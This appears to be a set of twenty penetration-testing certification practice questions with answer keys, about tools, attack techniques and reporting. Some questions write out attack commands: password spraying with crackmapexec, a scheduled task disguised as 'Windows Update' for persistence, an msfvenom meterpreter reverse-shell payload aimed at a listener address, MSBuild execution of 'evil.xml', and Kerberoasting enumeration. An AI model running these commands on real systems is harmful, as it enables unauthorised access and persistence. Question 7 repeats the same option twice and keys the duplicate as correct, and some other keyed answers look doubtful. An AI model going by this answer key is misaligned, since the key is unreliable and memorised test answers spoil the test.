QUESTION 1
A penetration tester is performing a security review of a web application. Which of the following should the tester leverage to identify the presence of vulnerable open-source libraries?
A. VM
B. IAST
C. DAST
D. SCA
Correct Answer: D
QUESTION 2
During a red-team exercise, a penetration tester obtains an employee’s access badge. The tester uses the badge’s information to create a duplicate for unauthorized entry. Which of the following best describes this action?
A. Smurfing
B. Credential stuffing
C. RFID cloning
D. Card skimming
Correct Answer: C
QUESTION 3
While performing an internal assessment, a tester uses the following command:
crackmapexec smb 192.168.1.0/24 -u user.txt -p sunm.er1230
Which of the following is the main purpose of the command?
A. To perform a pass-the-hash attack over multiple endpoints within the internal network
B. To perform common protocol scanning within the internal network
C. To perform password spraying on internal systems
D. To execute a command in multiple endpoints at the same time
Correct Answer: C
QUESTION 4
A penetration tester is performing network reconnaissance. The tester wants to gather information about the network without causing detection mechanisms to flag the reconnaissance activities. Which of the following techniques should the tester use?
A. Sniffing
B. Banner grabbing
C. TCP/UDP scanning
D. Ping sweeps
Correct Answer: A
QUESTION 5
A penetration tester gained a foothold within a network. The penetration tester needs to enumerate all users within the domain. Which of the following is the best way to accomplish this task?
A. pwd.exe
B. net.exe
C. sc.exe
D. msconfig.exe
Correct Answer: B
QUESTION 6
Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?
A. Risk analysis
B. Peer review
C. Root cause analysis
D. Client acceptance
Correct Answer: B
QUESTION 7
Which of the following explains the reason a tester would opt to use DREAD over PTES during the planning phase of a penetration test?
A. The tester is conducting a web application test.
B. The tester is assessing a mobile application.
C. The tester is evaluating a thick client application.
D. The tester is assessing a mobile application.
Correct Answer: D
QUESTION 8
Which of the following is within the scope of proper handling and most crucial when working on a penetration testing report?
A. Keeping both video and audio of everything that is done
B. Keeping the report to a maximum of 5 to 10 pages in length
C. Basing the recommendation on the risk score in the report
D. Making the report clear for all objectives with a precise executive summary
Correct Answer: D
QUESTION 9
During an assessment, a penetration tester gains access to one of the internal hosts. Given the following command:
schtasks /create /tn “Windows Update” /sc onlogon /tr “cmd.exe /c update.exe”
Which of the following is the penetration tester trying to do with this code?
A. Enumerate the scheduled tasks.
B. Establish persistence.
C. Deactivate the Windows Update functionality.
D. Create a binary application for Windows System Updates.
Correct Answer: B
QUESTION 10
A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp
The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?
A. regsvr32 is /n /u C:evil.xml
B. MSBuild.exe C:evil.xml
C. mshta.exe C:evil.xml
D. AppInstaller.exe C:evil.xml
Correct Answer: B
QUESTION 11
During an assessment, a penetration tester runs the following command:
setspn.exe -Q */*
Which of the following attacks is the penetration tester preparing for?
A. LDAP injection
B. Pass-the-hash
C. Kerberoasting
D. Dictionary
Correct Answer: C
QUESTION 12
Which of the following components should a penetration tester include in an assessment report?
A. User activities
B. Customer remediation plan
C. Key management
D. Attack narrative
Correct Answer: D
QUESTION 13
As part of an engagement, a penetration tester wants to maintain access to a compromised system after rebooting. Which of the following techniques would be best for the tester to use?
A. Establishing a reverse shell
B. Executing a process injection attack
C. Creating a scheduled task
D. Performing a credential-dumping attack
Correct Answer: C
QUESTION 14
A tester performs a vulnerability scan and identifies several outdated libraries used within the customer Saas product offering. Which of the following types of scans did the tester use to identify the libraries?
A. IAST
B. SBOM
C. DAST
D. SAST
Correct Answer: B
QUESTION 15
While conducting an assessment, a penetration tester identifies the details for several unreleased products announced at a company-wide meeting. Which of the following attacks did the tester most likely use to discover this information?
A. Eavesdropping
B. Bluesnarfing
C. Credential harvesting
D. SQL injection attack
Correct Answer: A
QUESTION 16
Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?
A. Burp Suite
B. masscan
C. Nmap
D. Hping
Correct Answer: B
QUESTION 17
During host discovery, a security analyst wants to obtain GeoIP information and a comprehensive summary of exposed services. Which of the following tools is best for this task?
A. WiGLE.net
B. WHOIS
C. theHarvester
D. Censys.io
Correct Answer: D
QUESTION 18
A client warns the assessment team that an ICS application is maintained by the manufacturer. Any tampering of the host could void the enterprise support terms of use. Which of the following techniques would be most effective to validate whether the application encrypts communications in transit?
A. Utilizing port mirroring on a firewall appliance
B. Installing packet capture software on the server
C. Reconfiguring the application to use a proxy
D. Requesting that certificate pinning be disabled
Correct Answer: A
QUESTION 19
During a preengagement activity with a new customer, a penetration tester looks for assets to test. Which of the following is an example of a target that can be used for testing?
A. API
B. HTTP
C. IPA
D. ICMP
Correct Answer: A
QUESTION 20
Which of the following tasks would ensure the key outputs from a penetration test are not lost as part of the cleanup and restoration activities?
A. Preserving artifacts
B. Reverting configuration changes
C. Keeping chain of custody
D. Exporting credential data
Correct Answer: A
We use cookies to improve your experience, including essential cookies required for the website to function. By continuing, you agree to our use of cookies. Learn more.
We use cookies to help you navigate efficiently and perform certain functions. You will find detailed information about all cookies under each consent category below.
Necessary cookies are required to enable the basic features of this site, such as providing secure log-in or adjusting your consent preferences. These cookies do not store any personally identifiable data.
Analytical cookies are used to understand how visitors interact with the website. These cookies help provide information on metrics such as the number of visitors, bounce rate, traffic source, etc.
Advertisement cookies are used to provide visitors with customised advertisements based on the pages you visited previously and to analyse the effectiveness of the ad campaigns.
Functional cookies help perform certain functionalities like sharing the content of the website on social media platforms, collecting feedback, and other third-party features.